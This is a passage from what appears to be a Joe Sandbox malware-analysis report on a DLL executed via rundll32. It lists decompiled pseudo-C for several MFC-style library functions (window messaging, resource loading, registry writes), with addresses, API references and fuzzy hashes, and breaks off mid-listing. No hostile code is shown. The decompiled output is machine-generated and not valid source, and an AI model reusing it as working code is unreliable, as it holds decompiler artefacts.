					_t43 = E10021041( *((intOrPtr*)(_t52 + 8)));
					_pop(_t46);
					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
				}
				_t45 = E1000EC09(_t44, 0, _t51, _t54);
				_t55 = _t45;
				if(_t45 == 0) {
					L4:
					E10004E6E(_t45, _t46, 0, _t51, _t55);
				}
				_t7 = _t45 + 0x74; // 0x74
				_t46 = _t7;
				_t37 = E10005EE5(_t45, _t7, 0, _t51, _t55);
				if(_t37 == 0) {
					goto L4;
				}
				 *((intOrPtr*)(_t37 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
				 *((intOrPtr*)(_t45 + 4)) = _t51;
				 *((intOrPtr*)(_t51 + 0x44)) = 0;
				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
				 *((intOrPtr*)(_t51 + 0x64)) = 0;
				 *((intOrPtr*)(_t51 + 0x68)) = 0;
				 *((intOrPtr*)(_t51 + 0x54)) = 0;
				 *((intOrPtr*)(_t51 + 0x60)) = 0;
				 *((intOrPtr*)(_t51 + 0x88)) = 0;
				 *((intOrPtr*)(_t51 + 0x58)) = 0;
				 *((short*)(_t51 + 0x92)) = 0;
				 *((short*)(_t51 + 0x90)) = 0;
				 *((intOrPtr*)(_t51 + 0x48)) = 0;
				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
				 *((intOrPtr*)(_t51 + 0x80)) = 0;
				 *((intOrPtr*)(_t51 + 0x84)) = 0;
				 *((intOrPtr*)(_t51 + 0x70)) = 0;
				 *((intOrPtr*)(_t51 + 0x74)) = 0;
				 *((intOrPtr*)(_t51 + 0x94)) = 0;
				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
				return E1001FC9C(_t51);
			}









                                                                                                            0x10006279
                                                                                                            0x10006279
                                                                                                            0x10006279
                                                                                                            0x10006279
                                                                                                            0x10006280
                                                                                                            0x10006285
                                                                                                            0x10006287
                                                                                                            0x1000628a
                                                                                                            0x10006291
                                                                                                            0x10006294
                                                                                                            0x10006297
                                                                                                            0x1000629d
                                                                                                            0x100062ad
                                                                                                            0x1000629f
                                                                                                            0x100062a2
                                                                                                            0x100062a7
                                                                                                            0x100062a8
                                                                                                            0x100062a8
                                                                                                            0x100062b5
                                                                                                            0x100062b7
                                                                                                            0x100062b9
                                                                                                            0x100062bb
                                                                                                            0x100062bb
                                                                                                            0x100062bb
                                                                                                            0x100062c0
                                                                                                            0x100062c0
                                                                                                            0x100062c3
                                                                                                            0x100062ca
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100062cc
                                                                                                            0x100062d5
                                                                                                            0x100062de
                                                                                                            0x100062e1
                                                                                                            0x100062e4
                                                                                                            0x100062e7
                                                                                                            0x100062ea
                                                                                                            0x100062ed
                                                                                                            0x100062f0
                                                                                                            0x100062f3
                                                                                                            0x100062f6
                                                                                                            0x100062fc
                                                                                                            0x100062ff
                                                                                                            0x10006306
                                                                                                            0x1000630d
                                                                                                            0x10006310
                                                                                                            0x10006316
                                                                                                            0x1000631c
                                                                                                            0x10006322
                                                                                                            0x10006325
                                                                                                            0x10006328
                                                                                                            0x1000632e
                                                                                                            0x10006334
                                                                                                            0x10006337
                                                                                                            0x1000633a
                                                                                                            0x1000634b

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10006280
                                                                                                              • Part of subcall function 10006D2B: __EH_prolog3.LIBCMT ref: 10006D32
                                                                                                            • __strdup.LIBCMT ref: 100062A2
                                                                                                            • GetCurrentThread.KERNEL32 ref: 100062CF
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100062D8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                            • String ID:
                                                                                                            • API String ID: 4206445780-0
                                                                                                            • Opcode ID: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
                                                                                                            • Instruction ID: a861acdeb37d33d153d410a00307fa8db88fca58120f636a03fd206092374481
                                                                                                            • Opcode Fuzzy Hash: 4af8da86511d4e5dd4408705f6d44fb27b71cb1393297a7f8bfc0f794a51907c
                                                                                                            • Instruction Fuzzy Hash: CA218CB4800B50CED721DF6AC58125AFBE8FFA4340F20891FE1AA86622CBB4A541CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C4FC Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E1000C4FC(intOrPtr* __ecx) {
				char _v20;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				intOrPtr* __esi;
				struct HWND__* _t18;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t33;

				_t28 = __ecx;
				_push(0);
				_t33 = __ecx;
				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
					__eax =  *__esi;
					__ecx = __esi;
					__eax =  *((intOrPtr*)( *__esi + 0x170))();
				}
				_t30 = SendMessageA;
				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
				E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
				_t28 = _t33;
				_t33 = E1000BBDF(0, _t28, SendMessageA);
				if(_t33 != 0) {
					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
					E1000B21C(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
					_t18 = GetCapture();
					if(_t18 != 0) {
						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
					}
					return _t18;
				} else {
					_push(_t28);
					_v20 = 0x10044410;
					E100209E8( &_v20, 0x1003e2dc);
					asm("int3");
					_push(4);
					E1001FBC4(E10032E9B, 0, SendMessageA, _t33);
					_t29 = E100105C8(0x104);
					_v32 = _t29;
					_t24 = 0;
					_v20 = 0;
					if(_t29 != 0) {
						_t24 = E1000E58E(_t29);
					}
					return E1001FC9C(_t24);
				}
			}












                                                                                                            0x1000c4fc
                                                                                                            0x1000c4fc
                                                                                                            0x1000c4fe
                                                                                                            0x1000c50b
                                                                                                            0x1000c50d
                                                                                                            0x1000c50f
                                                                                                            0x1000c511
                                                                                                            0x1000c511
                                                                                                            0x1000c517
                                                                                                            0x1000c526
                                                                                                            0x1000c533
                                                                                                            0x1000c538
                                                                                                            0x1000c53f
                                                                                                            0x1000c543
                                                                                                            0x1000c551
                                                                                                            0x1000c55e
                                                                                                            0x1000c563
                                                                                                            0x1000c56b
                                                                                                            0x1000c572
                                                                                                            0x1000c572
                                                                                                            0x1000c577
                                                                                                            0x1000c545
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6

                                                                                                            APIs
                                                                                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 1000C526
                                                                                                            • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 1000C551
                                                                                                              • Part of subcall function 1000B21C: GetTopWindow.USER32(?), ref: 1000B22A
                                                                                                            • GetCapture.USER32 ref: 1000C563
                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 1000C572
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CaptureWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 729421689-0
                                                                                                            • Opcode ID: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
                                                                                                            • Instruction ID: 6be588b9800c4661a8048c77b3f4dc846bf52327d538fd1bacd6bd973810de05
                                                                                                            • Opcode Fuzzy Hash: 0651f16ed6b41e0f0b2415e49c480ceeb8609fd727ddfcdb634436d2adc50095
                                                                                                            • Instruction Fuzzy Hash: CE0184B535061C7FFA216B248CC9FBB36ADEB4C7C9F010534F2419B0A6C6915C405620
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000DA65 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1000DA65(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				struct HRSRC__* _t25;
				void* _t28;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr _t37;
				struct HINSTANCE__* _t39;

				_push(__ecx);
				_t28 = 0;
				_t40 = _a8;
				_push(_t36);
				_t34 = __ecx;
				_v8 = 0;
				if(_a8 == 0) {
					L4:
					_t37 = _a4;
					_a8 = 1;
					if(_t28 != 0) {
						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
						if(_v8 != 0) {
							FreeResource(_v8);
						}
					}
					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
					}
					_t18 = _a8;
					L10:
					return _t18;
				}
				_t39 =  *(E1000EC09(0, __ecx, _t36, _t40) + 0xc);
				_t25 = FindResourceA(_t39, _a8, 0xf0);
				if(_t25 == 0) {
					goto L4;
				}
				_t18 = LoadResource(_t39, _t25);
				_v8 = _t18;
				if(_t18 == 0) {
					goto L10;
				}
				_t28 = LockResource(_t18);
				goto L4;
			}















                                                                                                            0x1000da68
                                                                                                            0x1000da6a
                                                                                                            0x1000da6c
                                                                                                            0x1000da6f
                                                                                                            0x1000da71
                                                                                                            0x1000da73
                                                                                                            0x1000da76
                                                                                                            0x1000daab
                                                                                                            0x1000daad
                                                                                                            0x1000dab0
                                                                                                            0x1000dab7
                                                                                                            0x1000dac9
                                                                                                            0x1000dacc
                                                                                                            0x1000dad1
                                                                                                            0x1000dad1
                                                                                                            0x1000dacc
                                                                                                            0x1000dadb
                                                                                                            0x1000dae5
                                                                                                            0x1000dae5
                                                                                                            0x1000daeb
                                                                                                            0x1000daee
                                                                                                            0x1000daf2
                                                                                                            0x1000daf2
                                                                                                            0x1000da7d
                                                                                                            0x1000da89
                                                                                                            0x1000da91
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000da95
                                                                                                            0x1000da9d
                                                                                                            0x1000daa0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000daa9
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,?,000000F0), ref: 1000DA89
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000DA95
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1000DAA3
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000DAD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
                                                                                                            • Instruction ID: 4e046e32b577ecbefe1a9e82239a09ae3eb10ed0fe8967592b5f7829ae1b7b8f
                                                                                                            • Opcode Fuzzy Hash: c41de263a0c4a0a2ff3e2e7faac820cf06b0051920168b0b46ae1c13a6c09a32
                                                                                                            • Instruction Fuzzy Hash: 71113A71604214EFEB01DFA5C888AAE7BB9FF0A390F01806AF90697261CB75DD00CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010F7E Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E10010F7E(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10045580; // 0x6a53a566
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10020F02( &_v24, 0x10, 0x1003809c, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10010F38(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E1001FBB5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                                                                                                            0x10010f7e
                                                                                                            0x10010f84
                                                                                                            0x10010f8b
                                                                                                            0x10010f8f
                                                                                                            0x10010f93
                                                                                                            0x10010f9a
                                                                                                            0x10010f9d
                                                                                                            0x10010fdd
                                                                                                            0x10010fee
                                                                                                            0x10010f9f
                                                                                                            0x10010fa5
                                                                                                            0x10010fa9
                                                                                                            0x10010fb7
                                                                                                            0x10010fbe
                                                                                                            0x10010fc0
                                                                                                            0x10010fca
                                                                                                            0x10010fca
                                                                                                            0x10010fa9
                                                                                                            0x10011002

                                                                                                            APIs
                                                                                                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10010FB7
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10010FC0
                                                                                                            • _swprintf.LIBCMT ref: 10010FDD
                                                                                                            • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10010FEE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 4210924919-0
                                                                                                            • Opcode ID: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
                                                                                                            • Instruction ID: 3a2604f4cfee837da5f4817c2b18a2a2174cbb3477f90de8d09310f3c9904bd3
                                                                                                            • Opcode Fuzzy Hash: 75749d2b2382c0398083ba7cb92d29f59f37c4d48f9a02f992366f8d0876f9a2
                                                                                                            • Instruction Fuzzy Hash: 5001C07260031AABDB11DF648D86FBF77ACEF48704F400429FA01EB152DBB4E90587A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10016DC9 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10016DC9(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
				intOrPtr _v8;
				char _v12;
				struct tagRECT _v28;
				intOrPtr _t35;

				_t35 = _a4;
				E1000EC55( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
				if(_a8 != 0) {
					IntersectRect( &_v28, _a8, _t35 - 0x9c);
					EqualRect( &_v28, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v28) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
				}
				if(_v8 != 0) {
					_push(_v12);
					_push(0);
					E1000E519();
				}
				return 0;
			}







                                                                                                            0x10016dd0
                                                                                                            0x10016ddc
                                                                                                            0x10016de5
                                                                                                            0x10016e08
                                                                                                            0x10016e15
                                                                                                            0x10016de7
                                                                                                            0x10016df2
                                                                                                            0x10016df3
                                                                                                            0x10016df4
                                                                                                            0x10016df5
                                                                                                            0x10016df7
                                                                                                            0x10016e27
                                                                                                            0x10016e3c
                                                                                                            0x10016e3c
                                                                                                            0x10016e47
                                                                                                            0x10016e49
                                                                                                            0x10016e4c
                                                                                                            0x10016e4e
                                                                                                            0x10016e4e
                                                                                                            0x10016e56

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                            • String ID:
                                                                                                            • API String ID: 3354205298-0
                                                                                                            • Opcode ID: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
                                                                                                            • Instruction ID: 49a1a39e4a335cb1035e2ca36527126fc36f233e68e158b4c8e2f4d27b7ad01c
                                                                                                            • Opcode Fuzzy Hash: 2557517eccbb9696ab163556630543b7d1cc2db7da66443bf135cd333d30a12f
                                                                                                            • Instruction Fuzzy Hash: 5E11EC7690011AEFDF02DF94CC89FDE7BB9FF08349F0080A1FA05AA011D7719A559B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10011A48 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 92%
                                                                                                            			E10011A48(void* __ecx, void* __eflags) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t11;
				int _t13;
				void* _t23;
				intOrPtr* _t30;
				void* _t32;
				void* _t34;
				void* _t35;

				_push(__ecx);
				_t23 = __ecx;
				if(E10004D4A(__eflags, 0x10) == 0) {
					_t30 = 0;
					__eflags = 0;
				} else {
					_t30 = E10011A2B(_t9);
				}
				_t11 = GetCurrentProcess();
				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
				_t34 = _t32;
				if(_t13 == 0) {
					if(_t30 != 0) {
						 *((intOrPtr*)( *_t30 + 4))(1);
					}
					E1001C4CE(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
				}
				 *((intOrPtr*)(_t30 + 4)) = _v8;
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
				return _t30;
			}















                                                                                                            0x10011a4b
                                                                                                            0x10011a50
                                                                                                            0x10011a5a
                                                                                                            0x10011a67
                                                                                                            0x10011a67
                                                                                                            0x10011a5c
                                                                                                            0x10011a63
                                                                                                            0x10011a63
                                                                                                            0x10011a7a
                                                                                                            0x10011a83
                                                                                                            0x10011a8b
                                                                                                            0x10011a8c
                                                                                                            0x10011a90
                                                                                                            0x10011a98
                                                                                                            0x10011a98
                                                                                                            0x10011aa5
                                                                                                            0x10011aa5
                                                                                                            0x10011aad
                                                                                                            0x10011ab3
                                                                                                            0x10011abb

                                                                                                            APIs
                                                                                                              • Part of subcall function 10004D4A: _malloc.LIBCMT ref: 10004D64
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10011A7A
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000), ref: 10011A80
                                                                                                            • DuplicateHandle.KERNEL32(00000000), ref: 10011A83
                                                                                                            • GetLastError.KERNEL32(?), ref: 10011A9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                            • String ID:
                                                                                                            • API String ID: 3704204646-0
                                                                                                            • Opcode ID: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
                                                                                                            • Instruction ID: ab2ce72c394f12d9cf7e836f78522521826892dae628e20e317a2ba2e4d81c76
                                                                                                            • Opcode Fuzzy Hash: 48c76622b07e1260fdb1534259b3491da0b71c0db79951e57b58b6256fd15158
                                                                                                            • Instruction Fuzzy Hash: A9017C76700204AFEB15DBA5CC89F9A7FA8DF88750F158415F905CF252EA70EC40DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000670D Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E1000670D(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E10004E6E(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000A8F0(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E1000EFCE( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}












                                                                                                            0x1000670d
                                                                                                            0x1000670f
                                                                                                            0x10006711
                                                                                                            0x10006718
                                                                                                            0x1000674d
                                                                                                            0x10006750
                                                                                                            0x10006727
